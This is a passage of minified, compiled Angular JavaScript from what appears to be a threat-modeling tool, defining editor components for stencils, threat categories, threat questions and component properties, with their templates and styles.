new(e||t)(Ee(Oa),Ee(Yi),Ee(Wn),Ee(_r))},t.\u0275cmp=Wt({type:t,selectors:[["app-stencils"]],viewQuery:function(e,i){if(1&e&&Mi(vut,5),2&e){let n;Vt(n=Bt())&&(i.matMenuTrigger=n.first)}},inputs:{selectedNode:"selectedNode"},features:[ci],decls:11,vars:6,consts:[["style","margin-left: 10px; margin-right: 10px;",4,"ngIf"],[2,"visibility","hidden","position","fixed",3,"matMenuTriggerFor"],["ctxMenu","matMenuTrigger"],["rightMenu","matMenu"],["matMenuContent",""],[2,"margin-left","10px","margin-right","10px"],["appearance","fill","style","width: 100%;",4,"ngIf"],[3,"selectedIndex","selectedIndexChange",4,"ngIf"],[3,"selectedTypeTemplate",4,"ngIf"],[4,"ngIf"],["appearance","fill",2,"width","100%"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],[3,"selectedIndex","selectedIndexChange"],[3,"label"],["matTabContent",""],[3,"label",4,"ngIf"],[1,"row"],[1,"column1"],["cdkDropList","",1,"prop-list","reorder-list",3,"cdkDropListDropped"],["mat-subheader",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","15px",3,"matTooltip","click"],["cdkDrag","","matTooltipShowDelay","1000",3,"highlight-light","highlight-dark","matTooltip","click","contextmenu",4,"ngFor","ngForOf"],[1,"column2"],["cdkDrag","","matTooltipShowDelay","1000",3,"matTooltip","click","contextmenu"],["mat-list-icon",""],["mat-line",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto",3,"matTooltip","click"],["matTooltipShowDelay","1000",3,"highlight-light","highlight-dark","matTooltip","click",4,"ngFor","ngForOf"],["matTooltipShowDelay","1000",3,"matTooltip","click"],["style","margin-left: auto; margin-right: 5px",4,"ngIf"],[2,"margin-left","auto","margin-right","5px"],[2,"margin","10px"],["appearance","fill",1,"property-form-field"],["matInput","","type","text","matTooltipShowDelay","1000",3,"spellcheck","ngModel","matTooltip","ngModelChange"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["matTooltipShowDelay","1000",3,"value","matTooltip","valueChange"],[3,"value",4,"ngFor","ngForOf"],["matInput","","type","text",3,"spellcheck","ngModel","ngModelChange"],["color","primary",3,"ngModel","ngModelChange"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],[3,"value"],[")","",4,"ngIf"],[")",""],["mat-raised-button","",3,"click"],[2,"margin-top","10px"],["appearance","fill","class","property-form-field",4,"ngIf"],["multiple","","matTooltipShowDelay","1000",3,"value","matTooltip","valueChange"],["cdkDrag","","matTooltipShowDelay","1000",3,"highlight-light","highlight-dark","matTooltip","click",4,"ngFor","ngForOf"],[3,"node","threatRule","canEdit","canEditName"],["cdkDrag","","matTooltipShowDelay","1000",3,"matTooltip","click"],["mat-line","",4,"ngIf"],[1,"prop-list","reorder-list"],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","15px",3,"disabled","matTooltip","click"],["matTooltipShowDelay","1000",3,"highlight-light","highlight-dark","matTooltip",4,"ngIf"],["matInput","",3,"spellcheck","ngModel","ngModelChange"],["matTooltipShowDelay","1000",3,"matTooltip"],[3,"selectedTypeTemplate"],["matInput","","type","text","matTooltip","selectedProperty.DisplayName","matTooltipShowDelay","1000",3,"spellcheck","ngModel","ngModelChange"],["style","padding-left: 60px;",4,"ngIf"],[2,"margin","10px 0 10px 10px"],[3,"value","valueChange"],[3,"label",4,"ngFor","ngForOf"],["matTooltipShowDelay","1000",3,"value","matTooltip",4,"ngFor","ngForOf"],["matTooltipShowDelay","1000",3,"value","matTooltip"],[2,"padding-left","60px"],[4,"ngFor","ngForOf"],["color","primary",3,"checked","change"],["style","margin-left: 20px; margin-right: 20px;",4,"ngIf"],["mat-menu-item","",3,"click"],[2,"margin-left","20px","margin-right","20px"]],template:function(e,i){if(1&e&&(ne(0,Nht,19,8,"div",0),s(1,"\n"),it(2,"div",1,2),s(4," \n"),m(5,"mat-menu",null,3),s(7," \n  "),ne(8,Wht,3,1,"ng-template",4),s(9," \n"),u(),s(10," ")),2&e){const n=Ti(6);V("ngIf",i.selectedNode),C(2),ri("left",i.menuTopLeftPosition.x)("top",i.menuTopLeftPosition.y),V("matMenuTriggerFor",n)}},dependencies:[Zi,Ri,an,Ta,Ea,Sd,kd,oa,br,da,nn,un,jr,Nr,yr,gg,qh,Mu,Uh,Go,Xa,ts,is,Or,Lr,rc,pp,Xo,qo,po,el,Pa,qp,Mut,Xi],styles:['.column1[_ngcontent-%COMP%]{float:left;width:350px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.prop-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]{height:48px;cursor:pointer}.prop-list[_ngcontent-%COMP%]     .mat-list-item-content{padding:0 8px!important}.prop-list[_ngcontent-%COMP%]     .mat-list-text{padding-left:8px!important}.prop-list[_ngcontent-%COMP%]   .mat-subheader[_ngcontent-%COMP%]{display:contents}.prop-list-light[_ngcontent-%COMP%]{border-right:1px solid rgba(0,0,0,.1)}.prop-list-dark[_ngcontent-%COMP%]{border-right:1px solid rgba(255,255,255,.1)}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.property-form-field[_ngcontent-%COMP%]{width:300px}.reorder-list[_ngcontent-%COMP%]{max-width:100%;display:block;border-radius:4px;overflow:hidden}.reorder-box[_ngcontent-%COMP%]{padding:5px 10px;color:#000000de;display:flex;flex-direction:row;align-items:center;box-sizing:border-box;cursor:move;font-size:14px}.cdk-drag-preview[_ngcontent-%COMP%]{box-sizing:border-box;border-radius:4px;box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.cdk-drag-placeholder[_ngcontent-%COMP%]{opacity:0}.cdk-drag-animating[_ngcontent-%COMP%]{transition:transform .25s cubic-bezier(0,0,.2,1)}.reorder-box[_ngcontent-%COMP%]:last-child{border:none}.reorder-list.cdk-drop-list-dragging[_ngcontent-%COMP%]   .reorder-box[_ngcontent-%COMP%]:not(.cdk-drag-placeholder){transition:transform .25s cubic-bezier(0,0,.2,1)}.disable[_ngcontent-%COMP%]{pointer-events:none}']}),t})();function Vht(t,a){if(1&t){const e=Ye();m(0,"table",4),s(1,"\n      "),m(2,"tr")(3,"td")(4,"mat-checkbox",5),he("change",function(){const r=be(e).$implicit,c=B();return Me(c.ImpactCatChanged(c.threatCat,r))}),s(5),oe(6,"translate"),u()()(),s(7,"\n    "),u()}if(2&t){const e=a.$implicit,i=B();C(4),V("checked",i.threatCat.ImpactCats.includes(e)),C(1),ke(re(6,2,i.GetImpactCategoryName(e)))}}let Bht=(()=>{class t{constructor(e){this.dataService=e,this.canEdit=!0}ngOnInit(){}ImpactCatChanged(e,i){const n=e.ImpactCats.indexOf(i);n>=0?e.ImpactCats.splice(n,1):e.ImpactCats.push(i)}GetImpactCategories(){return Vs.GetKeys()}GetImpactCategoryName(e){return Vs.ToString(e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Yi))},t.\u0275cmp=Wt({type:t,selectors:[["app-threat-category"]],inputs:{threatCat:"threatCat",canEdit:"canEdit"},decls:20,vars:11,consts:[["appearance","fill",2,"width","100%"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],[2,"margin-top","10px","display","flex","flex-wrap","wrap"],["style","min-width: 200px;",4,"ngFor","ngForOf"],[2,"min-width","200px"],["color","primary",3,"checked","change"]],template:function(e,i){1&e&&(m(0,"div"),s(1,"\n  "),m(2,"mat-form-field",0),s(3,"\n    "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n    "),m(8,"textarea",1),he("ngModelChange",function(r){return i.threatCat.Description=r}),u(),s(9,"\n  "),u(),s(10,"\n  "),m(11,"h3"),s(12),oe(13,"translate"),u(),s(14,"\n  "),m(15,"div",2),s(16,"\n    "),ne(17,Vht,8,4,"table",3),s(18,"\n  "),u(),s(19,"\n"),u()),2&e&&(Ct("disable",!i.canEdit),C(5),ke(re(6,7,"properties.Description")),C(3),V("spellcheck",i.dataService.HasSpellCheck)("ngModel",i.threatCat.Description),C(4),ke(re(13,9,"properties.ImpactCategories")),C(5),V("ngForOf",i.GetImpactCategories()))},dependencies:[Zi,an,Ta,Ea,br,nn,un,Go,Xa,Xi],styles:[".disable[_ngcontent-%COMP%]{pointer-events:none}"]}),t})();function Hht(t,a){if(1&t&&(m(0,"th",9),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(3);C(1),ke(re(2,1,i.GetImpactCategoryName(e)))}}function Uht(t,a){if(1&t){const e=Ye();m(0,"td",11)(1,"mat-checkbox",12),he("change",function(){const r=be(e).$implicit,c=B().$implicit;return Me(B(3).ImpactCatChanged(c,r))}),u()()}if(2&t){const e=a.$implicit,i=B().$implicit;C(1),V("checked",i.ImpactCats.includes(e))}}function qht(t,a){if(1&t&&(m(0,"tr"),s(1,"\n        "),m(2,"td"),s(3),u(),s(4,"\n        "),ne(5,Uht,2,1,"td",10),s(6,"\n      "),u()),2&t){const e=a.$implicit,i=B(3);C(3),ke(e.Name),C(2),V("ngForOf",i.GetImpactCategories())}}function Ght(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n    "),m(2,"mat-form-field",4),s(3,"\n      "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n      "),m(8,"textarea",5),he("ngModelChange",function(n){return be(e),Me(B(2).selectedThreatCatGroup.Description=n)}),u(),s(9,"\n    "),u(),s(10,"\n    "),m(11,"table",6),s(12,"\n      "),m(13,"tr"),s(14,"\n        "),m(15,"th"),s(16),oe(17,"translate"),u(),s(18,"\n        "),ne(19,Hht,3,3,"th",7),s(20,"\n      "),u(),s(21,"\n      "),ne(22,qht,7,2,"tr",8),s(23,"\n    "),u(),s(24,"\n  "),Mt()}if(2&t){const e=B(2);C(5),ke(re(6,6,"properties.Description")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedThreatCatGroup.Description),C(8),ke(re(17,8,"pages.config.ThreatCategory")),C(3),V("ngForOf",e.GetImpactCategories()),C(3),V("ngForOf",e.selectedThreatCatGroup.ThreatCategories)}}function jht(t,a){1&t&&it(0,"app-threat-category",13),2&t&&V("threatCat",B(2).selectedThreatCat)}function Qht(t,a){if(1&t&&(m(0,"div",1),s(1,"\n  "),m(2,"h2"),s(3),u(),s(4,"\n  "),ne(5,Ght,25,10,"ng-container",2),s(6,"\n  "),ne(7,jht,1,1,"app-threat-category",3),s(8,"\n"),u()),2&t){const e=B();C(3),ke(e.selectedNode.name()),C(2),V("ngIf",e.selectedThreatCatGroup),C(2),V("ngIf",e.selectedThreatCat)}}let $ht=(()=>{class t extends xa{constructor(e,i,n,r){super(),this.theme=e,this.dataService=i,this.dialog=n,this.translate=r,i.ConfigChanged.subscribe(c=>this.createNodes())}get selectedThreatCatGroup(){var e;return(null===(e=this.selectedNode)||void 0===e?void 0:e.data)instanceof Zb?this.selectedNode.data:null}get selectedThreatCat(){var e;return(null===(e=this.selectedNode)||void 0===e?void 0:e.data)instanceof Jb?this.selectedNode.data:null}ngOnInit(){setTimeout(()=>{this.createNodes()},100)}ImpactCatChanged(e,i){const n=e.ImpactCats.indexOf(i);n>=0?e.ImpactCats.splice(n,1):e.ImpactCats.push(i)}GetImpactCategories(){return Vs.GetKeys()}GetImpactCategoryName(e){return Vs.ToString(e)}createNodes(){const e=this.Nodes;this.Nodes=[];let i=(c,d,T,k)=>{let q={name:()=>c.Name,canSelect:!0,data:c,canRename:!0,onRename:Y=>{c.Name=Y},canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(c).subscribe(Y=>{Y&&(this.dataService.Config.DeleteThreatCategory(c),this.selectedNode==q&&(this.selectedNode=null),this.createNodes())})},canDuplicate:!0,onDuplicate:()=>{let Y=this.dataService.Config.CreateThreatCategory();Y.CopyFrom(c.Data),Y.Name=Y.Name+"-Copy",this.dataService.Config.GetThreatCategoryGroups().find(te=>te.ThreatCategories.includes(c)).AddThreatCategory(Y),this.createNodes(),this.selectedNode=this.FindNodeOfObject(Y),this.selectedNode.isRenaming=!0},canMoveUpDown:!0,onMoveUp:()=>{let Y=d.Data.threatCategorieIDs;if(0!=Y.findIndex(te=>te==c.ID)){let te=Y.findIndex(pe=>pe==c.ID);Y.splice(te,0,Y.splice(te-1,1)[0]),T.children.splice(te,0,T.children.splice(te-1,1)[0])}},onMoveDown:()=>{let Y=d.Data.threatCategorieIDs;if(Y.findIndex(te=>te==c.ID)!=Y.length-1){let te=Y.findIndex(pe=>pe==c.ID);Y.splice(te,0,Y.splice(te+1,1)[0]),T.children.splice(te,0,T.children.splice(te+1,1)[0])}},canMoveToGroup:!0,onMoveToGroups:()=>k.children.filter(Y=>Y!=T),onMoveToGroup:Y=>{let te="threatCategorieIDs";d.Data[te].splice(d.Data[te].indexOf(c.ID),1),Y.data.Data[te].push(c.ID),this.createNodes()}};return q},n=c=>{let d={name:()=>c.Name,canSelect:!0,data:c,canAdd:!0,onAdd:()=>{let T=this.dataService.Config.CreateThreatCategory();c.AddThreatCategory(T),this.createNodes(),this.selectedNode=this.FindNodeOfObject(T),this.selectedNode.isRenaming=!0},canRename:!0,onRename:T=>{c.Name=T},canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(c).subscribe(T=>{T&&(this.dataService.Config.DeleteThreatCategoryGroup(c),this.selectedNode==d&&(this.selectedNode=null),this.createNodes())})},children:[],canMoveUpDown:!0,onMoveUp:()=>{let T=this.dataService.Config.GetThreatCategoryGroups();if(0!=T.findIndex(k=>k.ID==c.ID)){let k=T.findIndex(q=>q.ID==c.ID);T.splice(k,0,T.splice(k-1,1)[0]),r.children.splice(k,0,r.children.splice(k-1,1)[0])}},onMoveDown:()=>{let T=this.dataService.Config.GetThreatCategoryGroups();if(T.findIndex(k=>k.ID==c.ID)!=T.length-1){let k=T.findIndex(q=>q.ID==c.ID);T.splice(k,0,T.splice(k+1,1)[0]),r.children.splice(k,0,r.children.splice(k+1,1)[0])}}};return d},r={name:()=>this.translate.instant("pages.config.threatcategories.ThreatCategoryGroups"),canSelect:!1,canAdd:!0,hasMenu:!0,icon:"flash_on",onAdd:()=>{let c=this.dataService.Config.CreateThreatCategoryGroup();this.createNodes(),this.selectedNode=this.FindNodeOfObject(c),this.selectedNode.isRenaming=!0},children:[]};this.dataService.Config.GetThreatCategoryGroups().forEach(c=>{let d=n(c);c.ThreatCategories.forEach(T=>d.children.push(i(T,c,d,r))),r.children.push(d)}),this.Nodes.push(r),xa.TransferExpandedState(e,this.Nodes),this.nodeTreeChanged.emit(this.Nodes)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(Wn),Ee(Sn))},t.\u0275cmp=Wt({type:t,selectors:[["app-threat-categories"]],features:[ci],decls:1,vars:1,consts:[["style","margin-left: 10px; margin-right: 10px;",4,"ngIf"],[2,"margin-left","10px","margin-right","10px"],[4,"ngIf"],[3,"threatCat",4,"ngIf"],["appearance","fill",2,"width","100%"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],[2,"margin-top","10px"],["style","padding: 0 3px 0 3px",4,"ngFor","ngForOf"],[4,"ngFor","ngForOf"],[2,"padding","0 3px 0 3px"],["style","text-align: center;",4,"ngFor","ngForOf"],[2,"text-align","center"],["color","primary",3,"checked","change"],[3,"threatCat"]],template:function(e,i){1&e&&ne(0,Qht,9,3,"div",0),2&e&&V("ngIf",i.selectedNode)},dependencies:[Zi,Ri,an,Ta,Ea,br,nn,un,Go,Xa,Bht,Xi]}),t})();function Kht(t,a){if(1&t){const e=Ye();m(0,"button",14),he("click",function(){return be(e),Me(B().threatQuestion.Name="")}),oe(1,"translate"),s(2,"\n      "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n    "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function Xht(t,a){if(1&t&&(m(0,"mat-option",15),s(1),u()),2&t){const e=a.$implicit;V("value",e),C(1),ke(e.DisplayName)}}function Yht(t,a){if(1&t&&(m(0,"mat-option",15),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B();V("value",e),C(1),ke(re(2,2,i.GetOptionTypeName(e)))}}function Jht(t,a){if(1&t&&(m(0,"div",18),s(1),u()),2&t){const e=B().$implicit,i=B();C(1),ct("Property set to ",i.threatQuestion.ChangesPerOption[e.Key].Value,"")}}function Zht(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",16),he("click",function(){const r=be(e).$implicit;return Me(B().selectedOption=r)}),s(1,"\n          "),m(2,"mat-icon",17),s(3,"arrow_right"),u(),s(4,"\n          "),m(5,"div",18),s(6),oe(7,"translate"),u(),s(8,"\n          "),ne(9,Jht,2,1,"div",19),s(10,"\n        "),u()}if(2&t){const e=a.$implicit,i=B();Ct("highlight-light",i.IsOptionSelected(e)&&!i.theme.IsDarkMode)("highlight-dark",i.IsOptionSelected(e)&&i.theme.IsDarkMode),C(2),ri("visibility",null!=i.threatQuestion.ChangesPerOption[e.Key]&&i.threatQuestion.ChangesPerOption[e.Key].Active?"visible":"hidden"),C(4),ke(re(7,8,e.Key)),C(3),V("ngIf",i.threatQuestion.Property&&1==(null==i.threatQuestion.ChangesPerOption[e.Key]?null:i.threatQuestion.ChangesPerOption[e.Key].Active))}}function eft(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n        "),m(2,"mat-checkbox",20),he("ngModelChange",function(n){be(e);const r=B();return Me(r.threatQuestion.ChangesPerOption[r.selectedOption.Key].Active=n)}),s(3),oe(4,"translate"),u(),s(5,"\n        "),it(6,"br"),s(7,"\n        Set "),m(8,"i"),s(9),u(),s(10," to "),m(11,"mat-checkbox",21),he("ngModelChange",function(n){be(e);const r=B();return Me(r.threatQuestion.ChangesPerOption[r.selectedOption.Key].Value=n)}),u(),s(12,"\n      "),Mt()}if(2&t){const e=B();C(2),V("ngModel",e.threatQuestion.ChangesPerOption[e.selectedOption.Key].Active),C(1),ke(re(4,5,"pages.config.threatquestion.setProperty")),C(6),ke(e.threatQuestion.Property.DisplayName),C(2),V("disabled",!(null!=e.threatQuestion.ChangesPerOption[e.selectedOption.Key]&&e.threatQuestion.ChangesPerOption[e.selectedOption.Key].Active))("ngModel",e.threatQuestion.ChangesPerOption[e.selectedOption.Key].Value)}}let EZ=(()=>{class t{constructor(e,i,n){this.theme=e,this.dataService=i,this.dialog=n,this.canEdit=!0,this.showAttackVector=!0}get threatQuestion(){return this._threatQuestion}set threatQuestion(e){this._threatQuestion=e,this.selectedOption=null}ngOnInit(){}GetProperties(){return this.threatQuestion.ComponentType.Properties}GetOptionTypes(){return Pl.GetTypes()}GetOptionTypeName(e){return Pl.ToString(e)}GetOptionValues(e){return Pl.GetOptions(e)}IsOptionSelected(e){return null!=this.selectedOption&&e.Key==this.selectedOption.Key}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(Wn))},t.\u0275cmp=Wt({type:t,selectors:[["app-threat-question"]],inputs:{canEdit:"canEdit",showAttackVector:"showAttackVector",threatQuestion:"threatQuestion"},decls:85,vars:44,consts:[["appearance","fill",1,"property-form-field"],["matInput","","type","text","matTooltipShowDelay","1000",3,"spellcheck","ngModel","matTooltip","ngModelChange"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["appearance","fill",2,"width","100%"],["matInput","","type","text",3,"spellcheck","ngModel","ngModelChange"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],["matTooltipShowDelay","1000",3,"value","matTooltip","valueChange"],[3,"value",4,"ngFor","ngForOf"],[1,"optionColumn1"],[1,"prop-list"],["mat-subheader",""],[3,"highlight-light","highlight-dark","click",4,"ngFor","ngForOf"],[1,"optionColumn2"],[4,"ngIf"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],[3,"value"],[3,"click"],["mat-list-icon",""],["mat-line","",2,"pointer-events","initial"],["mat-line","","style","pointer-events: initial;",4,"ngIf"],["color","primary","labelPosition","before",3,"ngModel","ngModelChange"],["color","primary",3,"disabled","ngModel","ngModelChange"]],template:function(e,i){1&e&&(m(0,"div"),s(1,"\n  "),m(2,"mat-form-field",0),s(3,"\n    "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n    "),m(8,"input",1),he("ngModelChange",function(r){return i.threatQuestion.Name=r}),u(),s(9,"\n    "),ne(10,Kht,6,3,"button",2),s(11,"\n  "),u(),s(12,"\n  "),it(13,"br"),s(14,"\n  "),m(15,"mat-form-field",3),s(16,"\n    "),m(17,"mat-label"),s(18),oe(19,"translate"),u(),s(20,"\n    "),m(21,"input",4),he("ngModelChange",function(r){return i.threatQuestion.Question=r}),u(),s(22,"\n  "),u(),s(23,"\n  "),it(24,"br"),s(25,"\n  "),m(26,"mat-form-field",3),s(27,"\n    "),m(28,"mat-label"),s(29),oe(30,"translate"),u(),s(31,"\n    "),m(32,"textarea",5),he("ngModelChange",function(r){return i.threatQuestion.Description=r}),u(),s(33,"\n  "),u(),s(34,"\n  "),it(35,"br"),s(36,"\n  "),m(37,"mat-form-field",0),s(38,"\n    "),m(39,"mat-label"),s(40),oe(41,"translate"),u(),s(42,"\n    "),m(43,"mat-select",6),he("valueChange",function(r){return i.threatQuestion.Property=r}),oe(44,"translate"),s(45,"\n      "),ne(46,Xht,2,2,"mat-option",7),s(47,"\n    "),u(),s(48,"\n  "),u(),s(49,"\n  "),it(50,"br"),s(51,"\n  "),m(52,"mat-form-field",0),s(53,"\n    "),m(54,"mat-label"),s(55),oe(56,"translate"),u(),s(57,"\n    "),m(58,"mat-select",6),he("valueChange",function(r){return i.threatQuestion.OptionType=r}),oe(59,"translate"),s(60,"\n      "),ne(61,Yht,3,4,"mat-option",7),s(62,"\n    "),u(),s(63,"\n  "),u(),s(64,"\n  "),m(65,"div"),s(66,"\n    "),m(67,"div",8),s(68,"\n      "),m(69,"mat-list",9),s(70,"\n        "),m(71,"div",10),s(72),oe(73,"translate"),u(),s(74,"\n        "),ne(75,Zht,11,10,"mat-list-item",11),s(76,"\n      "),u(),s(77,"\n    "),u(),s(78,"\n    "),m(79,"div",12),s(80,"\n      "),ne(81,eft,13,7,"ng-container",13),s(82,"\n    "),u(),s(83,"\n  "),u(),s(84,"\n"),u()),2&e&&(Ct("disable",!i.canEdit),C(5),ke(re(6,28,"properties.QuestionName")),C(3),at("matTooltip",i.threatQuestion.Name),V("spellcheck",i.dataService.HasSpellCheck)("ngModel",i.threatQuestion.Name),C(2),V("ngIf",i.threatQuestion.Name),C(8),ke(re(19,30,"properties.Question")),C(3),V("spellcheck",i.dataService.HasSpellCheck)("ngModel",i.threatQuestion.Question),C(8),ke(re(30,32,"properties.Description")),C(3),V("spellcheck",i.dataService.HasSpellCheck)("ngModel",i.threatQuestion.Description),C(8),ke(re(41,34,"general.Property")),C(3),at("matTooltip",re(44,36,null==i.threatQuestion.Property?null:i.threatQuestion.Property.Tooltip)),V("value",i.threatQuestion.Property),C(3),V("ngForOf",i.GetProperties()),C(9),ke(re(56,38,"properties.OptionType")),C(3),at("matTooltip",re(59,40,i.GetOptionTypeName(i.threatQuestion.OptionType))),V("value",i.threatQuestion.OptionType),C(3),V("ngForOf",i.GetOptionTypes()),C(8),Ct("prop-list-light",!i.theme.IsDarkMode)("prop-list-dark",i.theme.IsDarkMode),C(3),ke(re(73,42,"properties.ChangesPerOption")),C(3),V("ngForOf",i.GetOptionValues(i.threatQuestion.OptionType)),C(6),V("ngIf",i.threatQuestion&&i.selectedOption&&i.threatQuestion.Property))},dependencies:[Zi,Ri,an,Ta,Ea,oa,br,da,nn,un,jr,Nr,yr,Go,Xa,ts,is,Or,Lr,rc,Pa,Xi],styles:['.column1[_ngcontent-%COMP%]{float:left;width:350px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.prop-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]{height:48px;cursor:pointer}.prop-list[_ngcontent-%COMP%]     .mat-list-item-content{padding:0 8px!important}.prop-list[_ngcontent-%COMP%]     .mat-list-text{padding-left:8px!important}.prop-list[_ngcontent-%COMP%]   .mat-subheader[_ngcontent-%COMP%]{display:contents}.prop-list-light[_ngcontent-%COMP%]{border-right:1px solid rgba(0,0,0,.1)}.prop-list-dark[_ngcontent-%COMP%]{border-right:1px solid rgba(255,255,255,.1)}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.property-form-field[_ngcontent-%COMP%]{width:300px}.optionColumn1[_ngcontent-%COMP%]{float:left;width:300px}.optionColumn2[_ngcontent-%COMP%]{float:left;width:calc(100% - 310px);padding-left:10px}.disable[_ngcontent-%COMP%]{pointer-events:none}']}),t})();const tft=["ctxMenu"];function ift(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",21),he("click",function(){const r=be(e).$implicit;return Me(B(4).selectedProperty=r)})("contextmenu",function(n){const c=be(e).$implicit;return Me(B(4).OpenContextMenu(n,c))}),oe(1,"translate"),s(2,"\n                    "),m(3,"mat-icon",22),s(4,"arrow_right"),u(),s(5,"\n                    "),m(6,"div",23),s(7),oe(8,"translate"),u(),s(9,"\n                    "),m(10,"div",23),s(11),u(),s(12,"\n                    "),m(13,"button",24),he("click",function(){const r=be(e).$implicit;return Me(B(4).DeleteProperty(r))}),oe(14,"translate"),m(15,"mat-icon"),s(16,"delete"),u()(),s(17,"\n                  "),u()}if(2&t){const e=a.$implicit,i=B(4);Ct("highlight-light",i.selectedProperty===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedProperty===e&&i.theme.IsDarkMode),at("matTooltip",re(1,8,e.DisplayName)),C(7),ke(re(8,10,e.DisplayName)),C(4),ke(e.Type),C(2),at("matTooltip",re(14,12,"general.Delete"))}}function aft(t,a){if(1&t){const e=Ye();m(0,"button",32),he("click",function(){return be(e),Me(B(5).selectedProperty.DisplayName="")}),oe(1,"translate"),s(2,"\n                        "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n                      "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function nft(t,a){if(1&t&&(m(0,"mat-option",33),s(1),u()),2&t){const e=a.$implicit;V("value",e),C(1),ke(e)}}function oft(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n                  "),m(2,"div",25),s(3,"\n                    "),m(4,"mat-form-field",26),s(5,"\n                      "),m(6,"mat-label"),s(7),oe(8,"translate"),u(),s(9,"\n                      "),m(10,"input",27),he("ngModelChange",function(n){return be(e),Me(B(4).selectedProperty.DisplayName=n)}),u(),s(11,"\n                      "),ne(12,aft,6,3,"button",28),s(13,"\n                    "),u(),s(14,"\n                    "),it(15,"br"),s(16,"\n                    "),m(17,"mat-form-field",26),s(18,"\n                      "),m(19,"mat-label"),s(20),oe(21,"translate"),u(),s(22,"\n                      "),m(23,"mat-select",29),he("valueChange",function(n){return be(e),Me(B(4).selectedProperty.Type=n)}),s(24,"\n                        "),ne(25,nft,2,2,"mat-option",30),s(26,"\n                      "),u(),s(27,"\n                    "),u(),s(28,"\n                    "),it(29,"br"),s(30,"\n                    "),m(31,"mat-form-field",7),s(32,"\n                      "),m(33,"mat-label"),s(34),oe(35,"translate"),u(),s(36,"\n                      "),m(37,"input",31),he("ngModelChange",function(n){return be(e),Me(B(4).selectedProperty.Tooltip=n)}),u(),s(38,"\n                    "),u(),s(39,"\n                    "),s(40,"\n                  "),u(),s(41,"\n                "),Mt()}if(2&t){const e=B(4);C(7),ke(re(8,12,"general.PropertyName")),C(3),at("matTooltip",e.selectedProperty.DisplayName),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedProperty.DisplayName),C(2),V("ngIf",e.selectedProperty.DisplayName),C(8),ke(re(21,14,"general.Type")),C(3),at("matTooltip",e.selectedProperty.Type),V("value",e.selectedProperty.Type),C(2),V("ngForOf",e.GetPropertyTypes()),C(9),ke(re(35,16,"general.Tooltip")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedProperty.Tooltip)}}function rft(t,a){if(1&t){const e=Ye();s(0,"\n            "),m(1,"div",14),s(2,"\n              "),m(3,"div",15),s(4,"\n                "),m(5,"mat-list",16),he("cdkDropListDropped",function(n){be(e);const r=B(3);return Me(r.drop(n,r.selectedComponentType.Properties))}),s(6,"\n                  "),m(7,"div",17),s(8),oe(9,"translate"),m(10,"button",18),he("click",function(){return be(e),Me(B(3).AddProperty())}),oe(11,"translate"),m(12,"mat-icon"),s(13,"add"),u()()(),s(14,"\n                  "),ne(15,ift,18,14,"mat-list-item",19),s(16,"\n                "),u(),s(17,"\n              "),u(),s(18,"\n              "),m(19,"div",20),s(20,"\n                "),ne(21,oft,42,18,"ng-container",6),s(22,"\n              "),u(),s(23,"\n            "),u(),s(24,"\n          ")}if(2&t){const e=B(3);C(5),Ct("prop-list-light",!e.theme.IsDarkMode)("prop-list-dark",e.theme.IsDarkMode),C(3),za("",e.selectedComponentType.Name," ",re(9,9,"general.Properties")," 